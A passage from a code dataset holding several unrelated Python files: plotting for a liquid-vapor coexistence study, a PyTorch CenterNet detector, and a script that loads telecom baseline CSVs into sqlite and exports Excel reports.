plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n fig=plt.figure(figsize=(1,5))\n ax=fig.add_subplot(111)\n ax.axis([0,1,-50,200])\n cmap = mpl.cm.jet\n norm = mpl.colors.Normalize(vmin=-40, vmax=180)\n cb1 = mpl.colorbar.ColorbarBase(ax, cmap=cmap,\n orientation='vertical', \n norm=norm,\n ticks=[-40,180]\n )\n\n plt.subplots_adjust(left=0.4, right=0.8)\n \n #plt.savefig('figs/liqVapCo_Tvsff2.pdf')\n \n\n plt.figure()\n xx=np.arange(0,10,0.01)\n yy=xx*np.exp(-xx)\n\n path = Path(np.array([xx,yy]).transpose())\n patch = PathPatch(path, facecolor='none')\n plt.gca().add_patch(patch)\n\n im = plt.imshow(xx.reshape(yy.size,1), cmap=plt.cm.Reds,interpolation=\"bicubic\",\n origin='lower',extent=[0,10,-0.0,0.40],aspect=\"auto\", clip_path=patch, clip_on=True)\n #im.set_clip_path(patch)\n #plt.savefig(\"out.png\")\n\n plt.show()\n\n\n\n \n\ndef liq_vap_co_pvsT():\n pL=[]\n pR=[]\n pdiff=[]\n for i in range(0,len(nL)):\n pL.append(SW.findP(Tlist[i],nL[i]))\n pR.append(SW.findP(Tlist[i],nR[i]))\n pdiff.append(pL[i]-pR[i])\n plt.figure()\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n plt.ylabel('pressure')\n plt.xlabel('temperature')\n plt.plot(Tlist,pL,color='#f36118',linewidth=8)\n plt.plot(Tlist,pR,'c',linewidth=3)\n plt.savefig('figs/liqVapCo_pvsT.pdf')\n #plt.show()\n \n #plt.figure()\n #plt.title('Pressure check')\n #plt.ylabel('P')\n #plt.xlabel('T')\n #plt.plot(Tlist,pdiff,'r')\n #plt.savefig('figs/liqVapCo_pvsT_diff.pdf')\n\n\ndef cotangent_t0():\n plt.figure()\n plt.title('Helmholtz energy per volume VS ff @ T=%0.4f'%Tlist[100])\n plt.ylabel('Helmholtz free energy per volume')\n plt.xlabel('filling fraction')\n plt.plot(xff,SW.ftot(Tlist[100],x),color='#f36118',linewidth=3)\n plt.plot(xff, SW.numH_dftot_dn(Tlist[100],nR[100])*(x-nR[100])+SW.ftot(Tlist[100],nR[100]),color='#00c0c0',linewidth=2)\n #plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n #plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n plt.plot(nL[100]*((4*np.pi*(SW.R)**3)/3),SW.ftot(Tlist[100],nL[100]),'ko')\n plt.plot(nR[100]*((4*np.pi*(SW.R)**3)/3),SW.ftot(Tlist[100],nR[100]),'ko')\n plt.savefig('figs/hfe_cotangent.pdf')\n #plt.show()\n\n\ndef gfe():\n x2=plt.linspace(1e-20,.12,40000)\n mu=SW.numH_dftot_dn(Tlist[100],nR[100])\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu*x2,color='#f36118')\n plt.plot(x2,SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100])-mu*nR[100],'c')\n plt.plot(nL[100],SW.ftot(Tlist[100],nL[100])-mu*nR[100],'ko')\n plt.plot(nR[100],SW.ftot(Tlist[100],nR[100])-mu*nR[100],'ko')\n plt.show()\n\n\ndef gfe2():\n x2=plt.linspace(1e-20,.12,40000)\n mu=SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100])\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu,color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[100],0,'ko')\n plt.plot(nR[100],0,'ko')\n \n #plt.savefig('figs/gfe2.pdf')\n plt.show()\n \ndef gfe3():\n x2=plt.linspace(1e-20,.2,40000)\n mu=SW.numH_dftot_dn(Tlist[100],x2)\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[100])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[100],x2)-mu*nR[100],color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[100],0,'ko')\n plt.plot(nR[100],0,'ko')\n plt.show()\n\n\ndef gfe4():\n x2=plt.linspace(1e-20,.13,90000)\n xmin2=((4*np.pi*(SW.R)**3)/3)*1e-20\n xmax2=((4*np.pi*(SW.R)**3)/3)*.13\n xff2 = plt.linspace(xmin2,xmax2,90000)\n thigh=100\n plt.figure()\n plt.title('Grand free energy per volume vs ff @ T=%0.4f'%Tlist[thigh])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('filling fraction') \n plt.plot(xff2,SW.phi(Tlist[thigh],x2,nR[thigh]),color='#f36118',linewidth=3)\n #plt.axvline(nL[thigh])\n #plt.axvline(nR[thigh])\n #plt.axhline(SW.phi(Tlist[thigh],nR[thigh]))\n #plt.plot(x2,x2-x2,'c')\n plt.plot(nL[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nL[thigh],nR[thigh]),'ko')\n plt.plot(nR[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),'ko')\n plt.axhline(SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),color='c',linewidth=2)\n print(Tlist[100])\n print(nL[100],nR[100])\n plt.savefig('figs/gfe_cotangent.pdf')\n\n plt.figure()\n plt.plot(xff2,SW.phi(Tlist[thigh],x2,nR[thigh]),color='#f36118',linewidth=3)\n plt.plot(nL[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nL[thigh],nR[thigh]),'ko')\n plt.plot(nR[thigh]*((4*np.pi*(SW.R)**3)/3),SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),'ko')\n plt.axhline(SW.phi(Tlist[thigh],nR[thigh],nR[thigh]),color='c',linewidth=2)\n plt.xlim(0,0.0003)\n plt.ylim(-.000014,0.000006)\n print(Tlist[100])\n print(nL[100],nR[100])\n plt.savefig('figs/gfe_insert_cotangent.pdf')\n \n #plt.show()\n\n\ndef ideal():\n x2=plt.linspace(1e-20,.13,40000)\n \n tt=plt.linspace(1e-20,1.2,4000)\n plt.figure()\n plt.title('ideal gas')\n plt.ylabel('f')\n plt.xlabel('n') \n #plt.plot(x2,SW.fid(Tlist[100],x2),color='#f36118')\n #plt.plot(tt,SW.fid(tt,nR[100]))\n plt.show()\n\n\ndef gfe5():\n x2=plt.linspace(1e-20,.2,4000)\n lazy=100\n mu=SW.numH_dftot_dn(Tlist[lazy],x2)\n plt.figure()\n plt.title('Grand free energy per volume vs n@ T=%0.4f'%Tlist[lazy])\n plt.ylabel('Grand free energy per volume')\n plt.xlabel('number density (n)') \n plt.plot(x2,SW.ftot(Tlist[lazy],x2)-mu*x2,color='#f36118')\n plt.plot(x2,x2-x2,'c')\n plt.plot(nL[lazy],0,'ko')\n plt.plot(nR[lazy],0,'ko')\n plt.show()\n\n\ndef liq_vap_Tvsn():\n plt.figure()\n plt.plot(nL,Tlist,color='#f36118',linewidth=2)\n plt.plot(nR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(nR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')\n #plt.savefig('figs/liqVapCo_Tvsff.pdf')\n\n\n '''plt.figure()\n plt.plot(nL,Tlist,color='#f36118',linewidth=2)\n plt.plot(nR,Tlist,color='c',linewidth=2)\n plt.xlabel(r'$filling fraction$')\n plt.ylabel(r'$temperature$')\n plt.xlim(-.05,max(nR)+.05)\n plt.title('liquid-vapor coexistence '+r'$\\lambda_{SW}=1.5$')'''\n\n plt.show()\n\n\ndef cotangent_t100():\n x2=plt.linspace(1e-20,.2,4000)\n plt.figure()\n plt.title('Helmholtz energy per volume VS ff @ T=%0.4f'%Tlist[100])\n plt.ylabel('Helmholtz free energy per volume')\n plt.xlabel('filling fraction')\n plt.plot(x2,SW.ftot(Tlist[100],x2),color='#f36118',linewidth=3)\n plt.plot(x2, SW.numH_dftot_dn(Tlist[100],nR[100])*(x2-nR[100])+SW.ftot(Tlist[100],nR[100]),color='#00c0c0',linewidth=2)\n #plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n #plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n plt.plot(nL[100],SW.ftot(Tlist[100],nL[100]),'ko')\n plt.plot(nR[100],SW.ftot(Tlist[100],nR[100]),'ko')\n #plt.savefig('figs/hfe_cotangent.pdf')\n plt.show()\n\n#ideal()\n#liq_vap_co_pvsT()\n#liq_vap_Tvsff()\n#cotangent_t0()\n#gfe()\n#gfe2()\n#gfe3()\ngfe4()\n#liq_vap_Tvsn()\n#cotangent_t100()\n \n","repo_name":"droundy/deft","sub_path":"papers/thesis-scheirer/final/poster_plots.py","file_name":"poster_plots.py","file_ext":"py","file_size_in_byte":9325,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"92"} +{"seq_id":"74341442218","text":"from typing import Dict, Tuple\r\n\r\nimport torch\r\nfrom torch import nn\r\n\r\nfrom .backbone import resnet18\r\nfrom .losses import GaussianFocalLoss, L1Loss\r\nfrom .modules import CenterNetHead, CTResNetNeck\r\nfrom .utils import (\r\n batched_nms,\r\n gaussian_radius,\r\n gen_gaussian_target,\r\n get_local_maximum,\r\n get_topk_from_heatmap,\r\n transpose_and_gather_feat,\r\n)\r\n\r\n\r\nclass CenterNet(nn.Module):\r\n def __init__(self, num_classes: int = 4) -> None:\r\n super().__init__()\r\n self.num_classes = num_classes\r\n self.backbone = resnet18(pretrained=True)\r\n self.neck = CTResNetNeck(\r\n in_channels=512,\r\n num_deconv_filters=(256, 128, 64),\r\n num_deconv_kernels=(4, 4, 4),\r\n )\r\n self.bbox_head = CenterNetHead(\r\n in_channels=64, feat_channels=64, num_classes=num_classes\r\n )\r\n\r\n self.loss_center_haetmap = GaussianFocalLoss(loss_weight=1.0)\r\n self.loss_wh = L1Loss(loss_weight=0.1)\r\n self.loss_offset = L1Loss(loss_weight=1.0)\r\n\r\n def forward(self, x: torch.Tensor) -> Dict[str, torch.Tensor]:\r\n x = self.backbone(x)\r\n x = self.neck(x)\r\n feature = self.bbox_head(x)\r\n\r\n return feature\r\n\r\n def loss(\r\n self,\r\n feature: Dict[str, torch.Tensor],\r\n gt_bboxes: torch.Tensor,\r\n gt_labels: torch.Tensor,\r\n imgs_shape: torch.Tensor,\r\n ) -> Dict[str, torch.Tensor]:\r\n target = self.get_targets(\r\n gt_bboxes, gt_labels, feature[\"heatmap\"].shape, imgs_shape\r\n )\r\n\r\n loss_center_heatmap = self.loss_center_haetmap(\r\n feature[\"heatmap\"], target[\"center_heatmap_target\"]\r\n ).sum(dim=(3, 2, 1))\r\n loss_wh = self.loss_wh(feature[\"wh\"], target[\"wh_target\"]).sum(dim=(3, 2, 1))\r\n loss_offset = self.loss_offset(\r\n feature[\"offset\"],\r\n target[\"offset_target\"],\r\n ).sum(dim=(3, 2, 1))\r\n\r\n return {\r\n \"loss_center_heatmap\": loss_center_heatmap.mean(),\r\n \"loss_wh\": loss_wh.mean(),\r\n \"loss_offset\": loss_offset.mean(),\r\n }\r\n\r\n def get_targets(\r\n self, gt_bboxes, gt_labels, feat_shape, imgs_shape\r\n ) -> Dict[str, torch.Tensor]:\r\n \"\"\"Compute regression and classification targets in multiple images.\r\n Args:\r\n gt_bboxes (list[Tensor]): Ground truth bboxes for each image with\r\n shape (num_gts, 4) in [tl_x, tl_y, br_x, br_y] format.\r\n gt_labels (list[Tensor]): class indices corresponding to each box.\r\n feat_shape (list[int]): feature map shape with value [B, _, H, W]\r\n imgs_shape (list[int]): image shape in [h, w] format.\r\n Returns:\r\n tuple[dict,float]: The float value is mean avg_factor, the dict has\r\n components below:\r\n - center_heatmap_target (Tensor): targets of center heatmap, \\\r\n shape (B, num_classes, H, W).\r\n - wh_target (Tensor): targets of wh predict, shape \\\r\n (B, 2, H, W).\r\n - offset_target (Tensor): targets of offset predict, shape \\\r\n (B, 2, H, W).\r\n - wh_offset_target_weight (Tensor): weights of wh and offset \\\r\n predict, shape (B, 2, H, W).\r\n \"\"\"\r\n bs, _, feat_h, feat_w = feat_shape\r\n\r\n height_ratio = feat_h / imgs_shape[:, 1]\r\n width_ratio = feat_w / imgs_shape[:, 2]\r\n\r\n center_heatmap_target = gt_bboxes[-1].new_zeros(\r\n [bs, self.num_classes, feat_h, feat_w]\r\n )\r\n wh_target = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n offset_target = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n wh_offset_target_weight = gt_bboxes[:, -1].new_zeros([bs, 2, feat_h, feat_w])\r\n\r\n center_x = (gt_bboxes[:, 0] + gt_bboxes[:, 2]) * width_ratio / 2\r\n center_y = (gt_bboxes[:, 1] + gt_bboxes[:, 3]) * height_ratio / 2\r\n gt_centers = torch.cat([center_x.unsqueeze(1), center_y.unsqueeze(1)], dim=1)\r\n\r\n for j, ct in enumerate(gt_centers):\r\n ctx_int, cty_int = ct.int()\r\n ctx, cty = ct\r\n scale_box_h = (gt_bboxes[j, 3] - gt_bboxes[j, 1]) * height_ratio[j]\r\n scale_box_w = (gt_bboxes[j, 2] - gt_bboxes[j, 0]) * width_ratio[j]\r\n radius = gaussian_radius([scale_box_h, scale_box_w], min_overlap=0.3)\r\n radius = max(0, int(radius))\r\n ind = gt_labels[j] - 1\r\n gen_gaussian_target(\r\n center_heatmap_target[j, ind, :, :], [ctx_int, cty_int], radius\r\n )\r\n\r\n wh_target[j, 0, cty_int, ctx_int] = scale_box_w\r\n wh_target[j, 1, cty_int, ctx_int] = scale_box_h\r\n\r\n offset_target[j, 0, cty_int, ctx_int] = ctx - ctx_int\r\n offset_target[j, 1, cty_int, ctx_int] = cty - cty_int\r\n\r\n wh_offset_target_weight[j, :, cty_int, ctx_int] = 1\r\n\r\n return {\r\n \"center_heatmap_target\": center_heatmap_target,\r\n \"wh_target\": wh_target,\r\n \"offset_target\": offset_target,\r\n }\r\n\r\n def get_bboxes(\r\n self,\r\n center_heatmap_preds,\r\n wh_preds,\r\n offset_preds,\r\n with_nms=False,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform network output for a batch into bbox predictions.\r\n\r\n Args:\r\n center_heatmap_preds (list[Tensor]): Center predict heatmaps for\r\n all levels with shape (B, num_classes, H, W).\r\n wh_preds (list[Tensor]): WH predicts for all levels with\r\n shape (B, 2, H, W).\r\n offset_preds (list[Tensor]): Offset predicts for all levels\r\n with shape (B, 2, H, W).\r\n with_nms (bool): If True, do nms before return boxes.\r\n Default: False.\r\n\r\n Returns:\r\n list[tuple[Tensor, Tensor]]: Each item in result_list is 2-tuple.\r\n The first item is an (n, 5) tensor, where 5 represent\r\n (tl_x, tl_y, br_x, br_y, score) and the score between 0 and 1.\r\n The shape of the second tensor in the tuple is (n,), and\r\n each element represents the class label of the corresponding\r\n box.\r\n \"\"\"\r\n assert len(center_heatmap_preds) == len(wh_preds) == len(offset_preds)\r\n\r\n bboxes, labels = [], []\r\n for img_id in range(len(center_heatmap_preds)):\r\n bbox, label = self._get_bboxes_single(\r\n center_heatmap_preds[img_id : img_id + 1],\r\n wh_preds[img_id : img_id + 1],\r\n offset_preds[img_id : img_id + 1],\r\n with_nms=with_nms,\r\n )\r\n bboxes.append(bbox)\r\n labels.append(label)\r\n\r\n return torch.stack(bboxes), torch.stack(labels)\r\n\r\n def _get_bboxes_single(\r\n self,\r\n center_heatmap_pred,\r\n wh_pred,\r\n offset_pred,\r\n with_nms=True,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform outputs of a single image into bbox results.\r\n\r\n Args:\r\n center_heatmap_pred (Tensor): Center heatmap for current level with\r\n shape (1, num_classes, H, W).\r\n wh_pred (Tensor): WH heatmap for current level with shape\r\n (1, num_classes, H, W).\r\n offset_pred (Tensor): Offset for current level with shape\r\n (1, corner_offset_channels, H, W).\r\n img_meta (dict): Meta information of current image, e.g.,\r\n image size, scaling factor, etc.\r\n with_nms (bool): If True, do nms before return boxes.\r\n Default: True.\r\n\r\n Returns:\r\n tuple[Tensor, Tensor]: The first item is an (n, 5) tensor, where\r\n 5 represent (tl_x, tl_y, br_x, br_y, score) and the score\r\n between 0 and 1. The shape of the second tensor in the tuple\r\n is (n,), and each element represents the class label of the\r\n corresponding box.\r\n \"\"\"\r\n batch_det_bboxes, batch_labels = self.decode_heatmap(\r\n center_heatmap_pred,\r\n wh_pred,\r\n offset_pred,\r\n )\r\n\r\n det_bboxes = batch_det_bboxes.view([-1, 5])\r\n det_labels = batch_labels.view(-1)\r\n\r\n # batch_border = det_bboxes.new_tensor(img_meta[\"border\"])[..., [2, 0, 2, 0]]\r\n # det_bboxes[..., :4] -= batch_border\r\n\r\n if with_nms:\r\n det_bboxes, det_labels = self._bboxes_nms(det_bboxes, det_labels)\r\n\r\n return det_bboxes, det_labels\r\n\r\n def decode_heatmap(\r\n self,\r\n center_heatmap_pred: torch.Tensor,\r\n wh_pred: torch.Tensor,\r\n offset_pred: torch.Tensor,\r\n img_shape: Tuple[int] = (512, 512),\r\n k: int = 100,\r\n kernel: int = 3,\r\n ) -> Tuple[torch.Tensor]:\r\n \"\"\"Transform outputs into detections raw bbox prediction.\r\n\r\n Args:\r\n center_heatmap_pred (Tensor): center predict heatmap,\r\n shape (B, num_classes, H, W).\r\n wh_pred (Tensor): wh predict, shape (B, 2, H, W).\r\n offset_pred (Tensor): offset predict, shape (B, 2, H, W).\r\n img_shape (Tuple[int]): image shape in [h, w] format.\r\n k (int): Get top k center keypoints from heatmap. Default 100.\r\n kernel (int): Max pooling kernel for extract local maximum pixels.\r\n Default 3.\r\n\r\n Returns:\r\n tuple[torch.Tensor]: Decoded output of CenterNetHead, containing\r\n the following Tensors:\r\n\r\n - batch_bboxes (Tensor): Coords of each box with shape (B, k, 5)\r\n - batch_topk_labels (Tensor): Categories of each box with \\\r\n shape (B, k)\r\n \"\"\"\r\n height, width = center_heatmap_pred.shape[2:]\r\n inp_h, inp_w = img_shape\r\n\r\n center_heatmap_pred = get_local_maximum(center_heatmap_pred, kernel=kernel)\r\n\r\n *batch_dets, topk_ys, topk_xs = get_topk_from_heatmap(center_heatmap_pred, k=k)\r\n batch_scores, batch_index, batch_topk_labels = batch_dets\r\n\r\n wh = transpose_and_gather_feat(wh_pred, batch_index)\r\n offset = transpose_and_gather_feat(offset_pred, batch_index)\r\n topk_xs = topk_xs + offset[..., 0]\r\n topk_ys = topk_ys + offset[..., 1]\r\n tl_x = (topk_xs - wh[..., 0] / 2) * (inp_w / width)\r\n tl_y = (topk_ys - wh[..., 1] / 2) * (inp_h / height)\r\n br_x = (topk_xs + wh[..., 0] / 2) * (inp_w / width)\r\n br_y = (topk_ys + wh[..., 1] / 2) * (inp_h / height)\r\n\r\n batch_bboxes = torch.stack([tl_x, tl_y, br_x, br_y], dim=2)\r\n batch_bboxes = torch.cat((batch_bboxes, batch_scores[..., None]), dim=-1)\r\n\r\n return batch_bboxes, batch_topk_labels + 1\r\n\r\n def _bboxes_nms(self, bboxes, labels, max_num: int = 100) -> Tuple[torch.Tensor]:\r\n if labels.numel() > 0:\r\n bboxes, keep = batched_nms(\r\n bboxes[:, :4], bboxes[:, -1].contiguous(), labels\r\n )\r\n if max_num > 0:\r\n bboxes = bboxes[:max_num]\r\n labels = labels[keep][:max_num]\r\n\r\n return bboxes, labels\r\n","repo_name":"a5chin/centernet","sub_path":"centernet/centernet.py","file_name":"centernet.py","file_ext":"py","file_size_in_byte":11241,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"92"} +{"seq_id":"39165832100","text":"from pathlib import Path\nimport pandas as pd\nimport sqlite3\nfrom pyexcelerate import Workbook\nfrom datetime import date\n\n\ndef sqlcopybl(dbs, dbt):\n db1 = Path('C:/sqlite/2020' + str(dbs) + '_sqlite.db')\n db2 = Path('C:/sqlite/2020' + str(dbt) + '_sqlite.db')\n conn = sqlite3.connect(db1)\n c = conn.cursor()\n try:\n c.execute(\"ATTACH DATABASE '\" + str(db2) + \"' AS db_2\")\n c.execute(\"DROP TABLE IF EXISTS db_2.baseline\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_UMTS\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTE\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_GSM\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_700FU\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTemp\")\n c.execute(\"DROP TABLE IF EXISTS db_2.Baseline_LTempF\")\n c.execute(\"CREATE TABLE db_2.baseline AS SELECT * FROM baseline\")\n c.execute(\"CREATE TABLE db_2.Baseline_UMTS AS SELECT * FROM Baseline_UMTS\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTE AS SELECT * FROM Baseline_LTE\")\n c.execute(\"CREATE TABLE db_2.Baseline_GSM AS SELECT * FROM Baseline_GSM\")\n c.execute(\"CREATE TABLE db_2.Baseline_700FU AS SELECT * FROM Baseline_700FU\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTemp AS SELECT * FROM Baseline_LTemp\")\n c.execute(\"CREATE TABLE db_2.Baseline_LTempF AS SELECT * FROM Baseline_LTempF\")\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqlcsvimport(datsq, tipo, tec):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n conn = sqlite3.connect(datab)\n c = conn.cursor()\n c.execute(\"DROP TABLE IF EXISTS \" + tipo)\n try: # import baseline csv to sqlite by 10000 rows batch\n xlspath = Path('C:/xml/baseline/') # baseline csv directory\n base = pd.read_csv(xlspath / Path('bl' + tec + '.csv'), encoding='latin-1')\n base.to_sql(tipo, conn, if_exists='append', index=False, chunksize=10000)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqlcsvimp031(datsq, tipo):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n conn = sqlite3.connect(datab)\n c = conn.cursor()\n c.execute(\"DROP TABLE IF EXISTS \" + tipo)\n try: # import report LTE031 csv to sqlite by 10000 rows batch\n xlspath = Path('C:/xml/baseline/031/') # 031 csv directory\n for baself in xlspath.glob('*.csv'): # file iteration inside directory\n tempo = pd.read_csv(baself, sep=';', chunksize=50000) # csv read in 50K rows blocks\n for chunk in tempo:\n chunk.to_sql(tipo, conn, if_exists='append', index=False, chunksize=10000)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n return\n\n\ndef sqltabexport(datsq, tabs1, filenam):\n datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n today = date.today()\n xls_file = filenam + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n xls_path = datab.parent / xls_file # xls file path-name\n conn = sqlite3.connect(datab) # database connection\n c = conn.cursor()\n wb = Workbook()\n for i in tabs1:\n try:\n df = pd.read_sql_query(\"select * from \" + i + \";\", conn) # pandas dataframe from sqlite\n data = [df.columns.tolist()] + df.values.tolist() # dataframe to list to pyexcelerate save\n wb.new_sheet(i, data=data)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n c.close()\n conn.close()\n wb.save(xls_path)\n return\n\n\ndef amleprsqlconcat(tabs1, conn):\n # datab = Path('C:/sqlite/2020' + str(datsq) + '_sqlite.db')\n # today = date.today()\n # xls_file = filenam + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n # xls_path = datab.parent / xls_file # xls file path-name\n # conn = sqlite3.connect(datab) # database connection\n # c = conn.cursor()\n # wb = Workbook()\n dfconcat = pd.DataFrame()\n for i in tabs1:\n try:\n df = pd.read_sql_query(\"select * from \" + i + \";\", conn) # pandas dataframe from sqlite\n dfconcat = dfconcat.append(df, ignore_index=True)\n except sqlite3.Error as error: # sqlite error handling\n print('SQLite error: %s' % (' '.join(error.args)))\n data = [dfconcat.columns.tolist()] + dfconcat.values.tolist() # dataframe to list to pyexcelerate save\n # wb.new_sheet(filenam, data=data)\n # c.close()\n # conn.close()\n # # wb.save(xls_path)\n return data\n\n\ndef concat(tec):\n xlspath = Path('C:/xml/baseline/' + tec) # tec baselines from RF page directory\n conca = pd.DataFrame()\n for baself in xlspath.glob('*.xls'): # file iteration inside directory\n tempo = pd.read_html(str(baself))\n conca = conca.append(tempo)\n conca.to_csv(xlspath.parent / Path('bl' + tec + '.csv'))\n return\n\n\ndateini = 1217\ndatesq = 1218\n\n# stage1\nconcat('UMTS')\nconcat('LTE')\nconcat('Sitios')\nconcat('GSM')\nsqlcsvimport(datesq, 'baseline', 'Sitios')\nsqlcsvimport(datesq, 'Baseline_LTE', 'LTE')\nsqlcsvimport(datesq, 'Baseline_UMTS', 'UMTS')\nsqlcsvimport(datesq, 'Baseline_GSM', 'GSM')\n#\n# stage2\n# sqlcsvimp031(datesq, 'RSLTE031')\n# sqlcopybl(dateini, datesq)\n# stage3\n# proc = [3]\n# proc = [1, 2, 3, 4]\n# for iter1 in proc:\n# if iter1 == 1:\n# tabs = ['LNREL_DISC_700', 'LNREL_PART_NOCOLOC', 'LNREL_PART_NOCOSCTR', 'LNREL_PART_NOCOSITE',\n# 'LNREL_PART_UNDFND', 'LNMME_Miss', 'PCI_DistF1', 'RSI_DistF1', 'LTE_Param', 'WCEL_PARAM1',\n# 'BTS_PARAM']\n# filen = 'Mob_Audit'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 2:\n# tabs = ['T031_PAR_LNRELS']\n# filen = '031_LNREL'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 3:\n# tabs = ['IRFIM_Miss', 'AMLEPR_MISS', 'LNREL_COS_MISS', 'ADJL_AUD9560', 'ADJL_AUD9560G', 'ADJL_AUD626', 'ADJL_AUD626G',\n# 'ADJL_AUD651', 'ADJL_AUD651G', 'ADJL_AUD3075', 'ADJL_AUD3075G', 'ADJL_AUD3225', 'ADJL_AUD3225G']\n# filen = 'IRFIM_ADJL_Missing'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 4:\n# filet = 'LTE2051_1841_Disc'\n# datab = Path('C:/sqlite/2020' + str(datesq) + '_sqlite.db')\n# today = date.today()\n# xls_file = filet + '_' + today.strftime(\"%y%m%d\") + \".xlsx\"\n# xls_path = datab.parent / xls_file # xls file path-name\n# conn = sqlite3.connect(datab) # database connection\n# c = conn.cursor()\n# wb = Workbook()\n# tabs = ['IRFIM_626AUD', 'IRFIM_651AUD', 'IRFIM_9560AUD', 'IRFIM32253075AUD', 'IRFIM30753225AUD',\n# 'IRFIM_3075AUD', 'IRFIM_3225AUD']\n# filen = 'IRFIM_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['AMLEPR_3075_3225', 'AMLEPR_3075_651', 'AMLEPR_3075_626', 'AMLEPR_3075_9560', 'AMLEPR_3225_3075',\n# 'AMLEPR_3225_651', 'AMLEPR_3225_626', 'AMLEPR_3225_9560', 'AMLEPR_651_3075', 'AMLEPR_651_3225',\n# 'AMLEPR_651_626', 'AMLEPR_651_9560', 'AMLEPR_626_3075', 'AMLEPR_626_3225', ' AMLEPR_626_651',\n# 'AMLEPR_626_9560', 'AMLEPR_9560_3075', 'AMLEPR_9560_3225', 'AMLEPR_9560_651', 'AMLEPR_9560_626']\n# filen = 'AMLEPR_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNCEL_IDCONGEN_15_20', 'LNCEL_IDCONGEN_10', 'LNCEL_IDCONGEN_5'] # next audit\n# filen = 'LNCEL_IDCONGEN'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNCEL_AUD1841_15_20', 'LNCEL_AUD1841_10', 'LNCEL_AUD1841_5'] # next audit\n# filen = 'LNCEL_2051_1841'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# tabs = ['LNBTS_AUD2051']\n# filen = 'WBTS_DISC'\n# data1 = amleprsqlconcat(tabs, conn)\n# wb.new_sheet(filen, data=data1)\n# c.close()\n# conn.close()\n# wb.save(xls_path)\n# elif iter1 == 5:\n# tabs = ['T031_PAR_LNRELT']\n# filen = '031_LNREL'\n# sqltabexport(datesq, tabs, filen)\n# elif iter1 == 6:\n# tabs = ['LNCEL_Full', 'IRFIM_ref']\n# filen = 'IRFIM'\n# sqltabexport(datesq, tabs, filen)\nprint('ok')\n\n\n\n","repo_name":"grodriguece/NPO","sub_path":"700/umtsbljoin_201218.py","file_name":"umtsbljoin_201218.py","file_ext":"py","file_size_in_byte":8598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"11393535214","text":"import demjson\ndata =\t{\"data\":\n [{\n \"error_no\":\"0\",\n \"data\":\n [{\"rowcount\":123,\n \"title\":\"测试1\",\n 